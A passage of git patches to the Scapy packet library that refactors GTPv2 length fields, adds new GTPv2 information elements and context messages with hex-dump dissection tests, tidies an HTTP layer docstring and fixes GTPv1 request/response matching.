BitField("instance", 0, 4), StrLenField("data", "", length_from=lambda x: x.length)] @@ -556,8 +614,7 @@ class IE_NotImplementedTLV(gtp.IE_Base): class IE_IMSI(gtp.IE_Base): name = "IE IMSI" fields_desc = [ByteEnumField("ietype", 1, IEType), - FieldLenField("length", None, length_of="IMSI", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("IMSI", "33607080910", @@ -666,9 +723,7 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -681,8 +736,7 @@ class IE_Cause(gtp.IE_Base): class IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - FieldLenField("length", None, length_of="restart_counter", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("restart_counter", 0)] @@ -691,8 +745,7 @@ class IE_RecoveryRestart(gtp.IE_Base): class IE_APN(gtp.IE_Base): name = "IE APN" fields_desc = [ByteEnumField("ietype", 71, IEType), - FieldLenField("length", None, length_of="APN", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.APNStrLenField("APN", "internet", @@ -702,8 +755,7 @@ class IE_APN(gtp.IE_Base): class IE_BearerTFT(gtp.IE_Base): name = "IE Bearer TFT" fields_desc = [ByteEnumField("ietype", 84, IEType), - FieldLenField("length", None, length_of="Bearer_TFT", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), StrLenField("Bearer_TFT", "", @@ -713,7 +765,7 @@ class IE_BearerTFT(gtp.IE_Base): class IE_AMBR(gtp.IE_Base): name = "IE AMBR" fields_desc = [ByteEnumField("ietype", 72, IEType), - ShortField("length", 8), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("AMBR_Uplink", 0), @@ -723,8 +775,7 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - FieldLenField("length", None, length_of="digits", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("digits", "33123456789", @@ -734,9 +785,7 @@ class IE_MSISDN(gtp.IE_Base): class IE_Indication(gtp.IE_Base): name = "IE Indication" fields_desc = [ByteEnumField("ietype", 77, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ConditionalField( @@ -891,39 +940,55 @@ class PCO_Option(Packet): def extract_padding(self, pkt): return "", pkt + def post_build(self, p, pay): + if self.length is None: + p = p[:1] + struct.pack("!B", len(p) - 2) + p[2:] + return p + pay + + +class PCO_Protocol(Packet): + # 10.5.6.3 of 3GPP TS 24.008 + def extract_padding(self, pkt): + return "", pkt + + def post_build(self, p, pay): + if self.length is None: + p = p[:2] + struct.pack("!B", len(p) - 3) + p[3:] + return p + pay + class PCO_IPv4(PCO_Option): name = "IPv4" fields_desc = [ByteEnumField("type", None, PCO_OPTION_TYPES), - ByteField("length", 0), + ByteField("length", None), IPField("address", RandIP())] class PCO_Primary_DNS(PCO_Option): name = "Primary DNS Server IP Address" fields_desc = [ByteEnumField("type", None, PCO_OPTION_TYPES), - ByteField("length", 0), + ByteField("length", None), IPField("address", RandIP())] class PCO_Primary_NBNS(PCO_Option): name = "Primary DNS Server IP Address" fields_desc = [ByteEnumField("type", None, PCO_OPTION_TYPES), - ByteField("length", 0), + ByteField("length", None), IPField("address", RandIP())] class PCO_Secondary_DNS(PCO_Option): name = "Secondary DNS Server IP Address" fields_desc = [ByteEnumField("type", None, PCO_OPTION_TYPES), - ByteField("length", 0), + ByteField("length", None), IPField("address", RandIP())] class PCO_Secondary_NBNS(PCO_Option): name = "Secondary NBNS Server IP Address" fields_desc = [ByteEnumField("type", None, PCO_OPTION_TYPES), - ByteField("length", 0), + ByteField("length", None), IPField("address", RandIP())] @@ -971,44 +1036,44 @@ def len_options(pkt): return pkt.length - 4 if pkt.length else 0 -class PCO_P_CSCF_IPv6_Address_Request(PCO_Option): +class PCO_P_CSCF_IPv6_Address_Request(PCO_Protocol): name = "PCO PCO-P CSCF IPv6 Address Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ConditionalField(XBitField("address", "2001:db8:0:42::", 128), lambda pkt: pkt.length)] -class PCO_IM_CN_Subsystem_Signaling_Flag(PCO_Option): +class PCO_IM_CN_Subsystem_Signaling_Flag(PCO_Protocol): name = "PCO IM CN Subsystem Signaling Flag" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, length_from=len_options)] -class PCO_DNS_Server_IPv6(PCO_Option): +class PCO_DNS_Server_IPv6(PCO_Protocol): name = "PCO DNS Server IPv6 Address Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ConditionalField(XBitField("address", "2001:db8:0:42::", 128), lambda pkt: pkt.length)] -class PCO_SOF(PCO_Option): +class PCO_SOF(PCO_Protocol): name = "PCO MS Support of Network Requested Bearer Control indicator" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ] -class PCO_PPP(PCO_Option): +class PCO_PPP(PCO_Protocol): name = "PPP IP Control Protocol" fields_desc = [ByteField("Code", 0), ByteField("Identifier", 0), - ShortField("length", 0), + ShortField("length", None), PacketListField("Options", None, PCO_option_dispatcher, length_from=len_options)] @@ -1016,121 +1081,129 @@ def extract_padding(self, pkt): return "", pkt -class PCO_IP_Allocation_via_NAS(PCO_Option): +class PCO_IP_Allocation_via_NAS(PCO_Protocol): name = "PCO IP Address allocation via NAS Signaling" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, length_from=len_options)] -class PCO_P_CSCF_IPv4_Address_Request(PCO_Option): +class PCO_P_CSCF_IPv4_Address_Request(PCO_Protocol): name = "PCO PCO-P CSCF IPv4 Address Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ConditionalField(IPField("address", RandIP()), lambda pkt: pkt.length)] -class PCO_DNS_Server_IPv4(PCO_Option): +class PCO_DNS_Server_IPv4(PCO_Protocol): name = "PCO DNS Server IPv4 Address Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ConditionalField(IPField("address", RandIP()), lambda pkt: pkt.length)] -class PCO_IPv4_Link_MTU_Request(PCO_Option): +class PCO_IPv4_Link_MTU_Request(PCO_Protocol): name = "PCO IPv4 Link MTU Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), ConditionalField(ShortField("MTU_size", 1500), lambda pkt: pkt.length)] -class PCO_P_CSCF_Re_selection_Support(PCO_Option): +class PCO_P_CSCF_Re_selection_Support(PCO_Protocol): name = "PCO P-CSCF Re-selection Support" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, length_from=len_options)] -class PCO_PDU_Session_Id(PCO_Option): +class PCO_PDU_Session_Id(PCO_Protocol): name = "PCO PDU session ID" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), ByteField("length", 1), ByteField("PduSessionId", 1)] -class PCO_5GSM_Cause_Value(PCO_Option): +class PCO_5GSM_Cause_Value(PCO_Protocol): name = "PCO 5GSM Cause Value" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, length_from=len_options)] -class PCO_QoS_Rules_With_Support_Indicator(PCO_Option): +class PCO_QoS_Rules_With_Support_Indicator(PCO_Protocol): name = "PCO QoS Rules With Support Indicator" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + length_from=lambda pkt: pkt.length)] -class PCO_QoS_Flow_Descriptions_With_Support_Indicator(PCO_Option): +class PCO_QoS_Flow_Descriptions_With_Support_Indicator(PCO_Protocol): name = "PCO QoS Flow Descriptions With Support Indicator" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + length_from=lambda pkt: pkt.length)] -class PCO_S_Nssai(PCO_Option): +class PCO_S_Nssai(PCO_Protocol): name = "PCO S-NSSAI" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), - PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + ByteField("length", None), + ConditionalField( + ByteField("SST", 0), lambda pkt: pkt.length > 0), + ConditionalField( + ShortField("SD", 0), lambda pkt: pkt.length > 1), + ConditionalField( + ByteField("Hplmn_Sst", 0), lambda pkt: pkt.length >= 4), + ConditionalField( + ShortField("Hplmn_Sd", 0), lambda pkt: pkt.length > 4)] -class PCO_Qos_Rules(PCO_Option): +class PCO_Qos_Rules(PCO_Protocol): name = "PCO QoS Rules" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + length_from=lambda pkt: pkt.length)] -class PCO_Session_AMBR(PCO_Option): +class PCO_Session_AMBR(PCO_Protocol): name = "PCO Session AMBR" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), - PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + ByteField("length", 6), + ByteField("dlunit", 0), + ShortField("dlambr", 0), + ByteField("ulunit", 0), + ShortField("ulambr", 0)] -class PCO_QoS_Flow_Descriptions(PCO_Option): +class PCO_QoS_Flow_Descriptions(PCO_Protocol): name = "PCO QoS Flow Descriptions" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + length_from=lambda pkt: pkt.length)] -class PCO_IPCP(PCO_Option): +class PCO_IPCP(PCO_Protocol): name = "PCO Internet Protocol Control Protocol" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketField("PPP", None, PCO_PPP)] -class PCO_PPP_Auth(PCO_Option): +class PCO_PPP_Auth(PCO_Protocol): name = "PPP Password Authentication Protocol" fields_desc = [ByteField("Code", 0), ByteField("Identifier", 0), - ShortField("length", 0), + ShortField("length", None), ByteField("PeerID_length", 0), ConditionalField(StrFixedLenField( "PeerID", @@ -1146,18 +1219,18 @@ class PCO_PPP_Auth(PCO_Option): lambda pkt: pkt.Password_length)] -class PCO_PasswordAuthentificationProtocol(PCO_Option): +class PCO_PasswordAuthentificationProtocol(PCO_Protocol): name = "PCO Password Authentication Protocol" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketField("PPP", None, PCO_PPP_Auth)] -class PCO_PPP_Challenge(PCO_Option): +class PCO_PPP_Challenge(PCO_Protocol): name = "PPP Password Authentication Protocol" fields_desc = [ByteField("Code", 0), ByteField("Identifier", 0), - ShortField("length", 0), + ShortField("length", None), ByteField("value_size", 0), ConditionalField(StrFixedLenField( "value", "", @@ -1169,10 +1242,10 @@ class PCO_PPP_Challenge(PCO_Option): lambda pkt: pkt.length)] -class PCO_ChallengeHandshakeAuthenticationProtocol(PCO_Option): +class PCO_ChallengeHandshakeAuthenticationProtocol(PCO_Protocol): name = "PCO Password Authentication Protocol" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), + ByteField("length", None), PacketField("PPP", None, PCO_PPP_Challenge)] @@ -1210,9 +1283,7 @@ def PCO_protocol_dispatcher(s): class IE_PCO(gtp.IE_Base): name = "IE Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 78, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("Extension", 0, 1), @@ -1225,9 +1296,7 @@ class IE_PCO(gtp.IE_Base): class IE_EPCO(gtp.IE_Base): name = "IE Extended Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 197, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("Extension", 0, 1), @@ -1240,9 +1309,7 @@ class IE_EPCO(gtp.IE_Base): class IE_PAA(gtp.IE_Base): name = "IE PAA" fields_desc = [ByteEnumField("ietype", 79, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1261,9 +1328,7 @@ class IE_PAA(gtp.IE_Base): class IE_Bearer_QoS(gtp.IE_Base): name = "IE Bearer Quality of Service" fields_desc = [ByteEnumField("ietype", 80, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 1), @@ -1281,8 +1346,7 @@ class IE_Bearer_QoS(gtp.IE_Base): class IE_ChargingID(gtp.IE_Base): name = "IE Charging ID" fields_desc = [ByteEnumField("ietype", 94, IEType), - FieldLenField("length", None, length_of="ChargingID", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("ChargingID", 0)] @@ -1291,9 +1355,7 @@ class IE_ChargingID(gtp.IE_Base): class IE_ChargingCharacteristics(gtp.IE_Base): name = "IE Charging Characteristics" fields_desc = [ByteEnumField("ietype", 95, IEType), - FieldLenField("length", None, - length_of="ChargingCharacteristric", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), XShortField("ChargingCharacteristric", 0)] @@ -1302,9 +1364,7 @@ class IE_ChargingCharacteristics(gtp.IE_Base): class IE_PDN_type(gtp.IE_Base): name = "IE PDN Type" fields_desc = [ByteEnumField("ietype", 99, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1314,9 +1374,7 @@ class IE_PDN_type(gtp.IE_Base): class IE_UE_Timezone(gtp.IE_Base): name = "IE UE Time zone" fields_desc = [ByteEnumField("ietype", 114, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("Timezone", 0), @@ -1326,8 +1384,7 @@ class IE_UE_Timezone(gtp.IE_Base): class IE_Port_Number(gtp.IE_Base): name = "IE Port Number" fields_desc = [ByteEnumField("ietype", 126, IEType), - FieldLenField("length", None, length_of="PortNumber", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ShortField("PortNumber", RandShort())] @@ -1336,8 +1393,7 @@ class IE_Port_Number(gtp.IE_Base): class IE_APN_Restriction(gtp.IE_Base): name = "IE APN Restriction" fields_desc = [ByteEnumField("ietype", 127, IEType), - FieldLenField("length", None, length_of="APN_Restriction", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("APN_Restriction", 0)] @@ -1346,9 +1402,7 @@ class IE_APN_Restriction(gtp.IE_Base): class IE_SelectionMode(gtp.IE_Base): name = "IE Selection Mode" fields_desc = [ByteEnumField("ietype", 128, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 6), @@ -1358,9 +1412,7 @@ class IE_SelectionMode(gtp.IE_Base): class IE_MMBR(gtp.IE_Base): name = "IE Max MBR/APN-AMBR (MMBR)" fields_desc = [ByteEnumField("ietype", 161, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("uplink_rate", 0), @@ -1370,9 +1422,7 @@ class IE_MMBR(gtp.IE_Base): class IE_UPF_SelInd_Flags(gtp.IE_Base): name = "IE UP Function Selection Indication Flags" fields_desc = [ByteEnumField("ietype", 202, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 7), @@ -1382,9 +1432,7 @@ class IE_UPF_SelInd_Flags(gtp.IE_Base): class IE_FQCSID(gtp.IE_Base): name = "IE FQ-CSID" fields_desc = [ByteEnumField("ietype", 132, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("nodeid_type", 0, 4), @@ -1404,9 +1452,7 @@ class IE_FQCSID(gtp.IE_Base): class IE_Ran_Nas_Cause(gtp.IE_Base): name = "IE RAN/NAS Cause" fields_desc = [ByteEnumField("ietype", 172, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("protocol_type", 0, 4), @@ -1419,8 +1465,7 @@ class IE_PrivateExtension(gtp.IE_Base): name = "Private Extension" fields_desc = [ ByteEnumField("ietype", 255, IEType), - FieldLenField("length", None, length_of="enterprisenum", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("SPARE", 0, 4), BitField("instance", 0, 4), ShortEnumField("enterprisenum", None, IANA_ENTERPRISE_NUMBERS), @@ -1436,7 +1481,7 @@ def extract_padding(self, s): 71: IE_APN, 72: IE_AMBR, 73: IE_EPSBearerID, - 74: IE_IPv4, + 74: IE_IP_Address, 75: IE_MEI, 76: IE_MSISDN, 77: IE_Indication, @@ -1453,11 +1498,14 @@ def extract_padding(self, s): 95: IE_ChargingCharacteristics, 97: IE_BearerFlags, 99: IE_PDN_type, + 107: IE_MMContext_EPS, + 109: IE_PDNConnection, 114: IE_UE_Timezone, 126: IE_Port_Number, 127: IE_APN_Restriction, 128: IE_SelectionMode, 132: IE_FQCSID, + 136: IE_FQDN, 145: IE_UCI, 161: IE_MMBR, 172: IE_Ran_Nas_Cause, @@ -1575,6 +1623,18 @@ class GTPV2DeleteBearerResponse(GTPV2Command): name = "GTPv2 Delete Bearer Response" +class GTPV2ContextRequest(GTPV2Command): + name = "GTPv2 Context Request" + + +class GTPV2ContextResponse(GTPV2Command): + name = "GTPv2 Context Response" + + +class GTPV2ContextAcknowledge(GTPV2Command): + name = "GTPv2 Context Acknowledge" + + class GTPV2CreateIndirectDataForwardingTunnelRequest(GTPV2Command): name = "GTPv2 Create Indirect Data Forwarding Tunnel Request" @@ -1628,6 +1688,9 @@ class GTPV2DownlinkDataNotifAck(GTPV2Command): bind_layers(GTPHeader, GTPV2UpdateBearerResponse, gtp_type=98) bind_layers(GTPHeader, GTPV2DeleteBearerRequest, gtp_type=99) bind_layers(GTPHeader, GTPV2DeleteBearerResponse, gtp_type=100) +bind_layers(GTPHeader, GTPV2ContextRequest, gtp_type=130) +bind_layers(GTPHeader, GTPV2ContextResponse, gtp_type=131) +bind_layers(GTPHeader, GTPV2ContextAcknowledge, gtp_type=132) bind_layers(GTPHeader, GTPV2SuspendNotification, gtp_type=162) bind_layers(GTPHeader, GTPV2SuspendAcknowledge, gtp_type=163) bind_layers(GTPHeader, GTPV2ResumeNotification, gtp_type=164) diff --git a/scapy/fields.py b/scapy/fields.py index 6b5299a66d1..7cb29a5f663 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1572,6 +1572,9 @@ def randval(self): class LenField(Field): + """ + If None, will be filled with the size of the payload + """ __slots__ = ["adjust"] def __init__(self, name, default, fmt="H", adjust=lambda x: x): diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 02204d14760..99b9f8d0102 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -52,6 +52,11 @@ assert isinstance(d[GTP_U_Header].payload, IP) a = IP(raw(IP()/UDP()/GTP_U_Header()/PPP())) assert isinstance(a[GTP_U_Header].payload, PPP) += GTPPDUSessionContainer(), dissect +h = "fa163e7da573fa163e43f8e708004500008400000000fd119f520a0a05010a0a0502086808680070000034ff006000000010fa163e85020044000000000045000054cd4e000040015a440a0a08020a0a370100001aca0046000142cff45e00000000e2ed0c0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637" +gtp = Ether(hex_bytes(h)) +gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].extraPadding == b'\x00\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.8.2' and gtp[GTP_U_Header][IP][ICMP].type == 0 + = GTPCreatePDPContextRequest(), basic instantiation gtp = IP(src="127.0.0.1", dst="127.0.0.1")/UDP(dport=2123, sport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() gtp.dport == 2123 and gtp.teid == 2807 and len(gtp.IE_list) == 5 diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 252cac06121..beff54fef2b 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -109,14 +109,14 @@ ie.EBI == 50 ie = IE_EPSBearerID(ietype='EPS Bearer ID', length=1, EBI=50) ie.ietype == 73 and ie.EBI == 50 -= IE_IPv4, dissection += IE_IP_Address, dissection h = "3333333333332222222222228100838408004580006d00000000f31180d20a2a00010a2a0002084b85930059e49a4823004d84530d5a4cdee2000200020010004c00060011111111111149000100b248000800000061a8000249f07f000100005d00130049000100da0200020010005e00040039004f454a0004007f00000436f73a63" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[6] ie.address == '127.0.0.4' -= IE_IPv4, basic instantiation -ie = IE_IPv4(ietype='IPv4', length=4, address='127.0.0.4') += IE_IP_Address, basic instantiation +ie = IE_IP_Address(ietype='IP Address', length=4, address='127.0.0.4') ie.ietype == 74 and ie.address == '127.0.0.4' = IE_MEI, dissection @@ -165,6 +165,37 @@ ie = IE_PCO(ietype='Protocol Configuration Options', length=8, Extension=1, PPP= PCO_DNS_Server_IPv4(type='DNS Server IPv4 Address Request', length=4, address='10.42.0.3')]) ie.Extension == 1 and ie.PPP == 3 and ie.Protocols[0].address == '10.42.0.3' += IE_EPCO, dissection +h = "d89ef3da40e2fa163e956dce08004500003000010000401144e10a0f0f3d0a0f1281084b084b001c0c154821000c0000000100000100c500040080001b00" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.Protocols[0].type == 27 + += IE_EPCO, basic instantiation +ie = IE_EPCO(Protocols=[PCO_S_Nssai(type=27, length=0)], ietype=197, length=4, CR_flag=0, instance=0, Extension=1, SPARE=0, PPP=0) +ie.Extension == 1 and ie.ietype == 197 and ie.Protocols[0].type == 27 and ie.Protocols[0].length == 0 + += IE_MMContext_EPS, dissection +h = "d89ef3da40e2fa163e956dce08004500007f0001000040114bbd0a0a0f3d0a0f0b5b084b084b006b5a234883005f0000180f76d163006b0046008800910000020000021890aa80be385102083701a2907066f8bd9f2a28b717671c71c71c71c71c71c70100003d090002625a00028040000812345678900000000000000000006d000900880005000470677731" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.Sec_Mode == 4 and ie.Nhi == 0 and ie.Drxi == 1 and ie.Ksi == 0 and ie.Num_quint == 0 and ie.Num_Quad == 0 and ie.Uambri == 0 and ie.Osci == 0 and ie.Sambri == 1 and ie.Nas_algo == 1 and ie.Nas_cipher == 1 and ie.Nas_dl_count == 2 and ie.Nas_ul_count == 2 and ie.Kasme == 11111111111111111111111111111111111111111111111111111111111111111111111111111 + += IE_MMContext_EPS, basic instantiation +ie = IE_MMContext_EPS(ietype=107, length=70, CR_flag=0, instance=0, Sec_Mode=4, Nhi=0, Drxi=1, Ksi=0, Num_quint=0, Num_Quad=0, Uambri=0, Osci=0, Sambri=1, Nas_algo=1, Nas_cipher=1, Nas_dl_count=2, Nas_ul_count=2, Kasme=11111111111111111111111111111111111111111111111111111111111111111111111111111) +ie.Sec_Mode == 4 and ie.Nhi == 0 and ie.Drxi == 1 and ie.Ksi == 0 and ie.Num_quint == 0 and ie.Num_Quad == 0 and ie.Uambri == 0 and ie.Osci == 0 and ie.Sambri == 1 and ie.Nas_algo == 1 and ie.Nas_cipher == 1 and ie.Nas_dl_count == 2 and ie.Nas_ul_count == 2 and ie.Kasme == 11111111111111111111111111111111111111111111111111111111111111111111111111111 + += IE_PDNConnection, IE_FQDN, dissection +h = "d89ef3da40e2fa163e956dce08004500007f0001000040114bbd0a0a0f3d0a0f0b5b084b084b006b5a234883005f0000180f76d163006b0046008800910000020000021890aa80be385102083701a2907066f8bd9f2a28b717671c71c71c71c71c71c70100003d090002625a00028040000812345678900000000000000000006d000900880005000470677731" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[1].IE_list[0] +ie.fqdn_tr_bit == 4 and ie.fqdn == b'pgw1' + += IE_PDNConnection, IE_FQDN, basic instantiation +ie = IE_PDNConnection(IE_list=[IE_FQDN(ietype=136, length=5, CR_flag=0, instance=0, fqdn_tr_bit=4, fqdn=b'pgw1')], ietype=109, length=9, CR_flag=0, instance=0) +ie2 = ie.IE_list[0] +ie2.fqdn_tr_bit == 4 and ie2.fqdn == b'pgw1' + = IE_PAA, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) From 09885ffaf2b34abf54adf178e0b801f5943f63e3 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sun, 19 Jul 2020 00:02:03 +0200 Subject: [PATCH 0224/1632] Minor HTTP doc fix --- scapy/layers/http.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 0624ac70290..fbe25b4ff2b 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -9,19 +9,23 @@ """ HTTP 1.0 layer. -Load using: +Load using:: + + from scapy.layers.http import * + +Or (console only):: >>> load_layer("http") Note that this layer ISN'T loaded by default, as quite experimental for now. To follow HTTP packets streams = group packets together to get the -whole request/answer, use `TCPSession` as: +whole request/answer, use ``TCPSession`` as: >>> sniff(session=TCPSession) # Live on-the-flow session >>> sniff(offline="./http_chunk.pcap", session=TCPSession) # pcap -This will decode HTTP packets using `Content_Length` or chunks, +This will decode HTTP packets using ``Content_Length`` or chunks, and will also decompress the packets when needed. Note: on failure, decompression will be ignored. From 71df76501f9cc78a075bd0d524a1267ee5eb3dc0 Mon Sep 17 00:00:00 2001 From: Lukas Kuzmiak Date: Sun, 19 Jul 2020 02:51:56 -0700 Subject: [PATCH 0225/1632] fix hashret/answers for contrib/gtp.py (#2568) * fix hashret/answers for contrib/gtp.py * Improve GTPv1 answers/hashret Co-authored-by: gpotter2 --- scapy/contrib/gtp.py | 32 +++++++++----------------------- test/contrib/gtp.uts | 6 ++++++ 2 files changed, 15 insertions(+), 23 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index d7415915fff..4ef70479b19 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -234,11 +234,15 @@ def post_build(self, p, pay): return p def hashret(self): - return struct.pack("B", self.version) + self.payload.hashret() + hsh = struct.pack("B", self.version) + if self.seq: + hsh += struct.pack("H", self.seq) + return hsh + self.payload.hashret() def answers(self, other): return (isinstance(other, GTPHeader) and self.version == other.version and + (not self.seq or self.seq == other.seq) and self.payload.answers(other.payload)) @classmethod 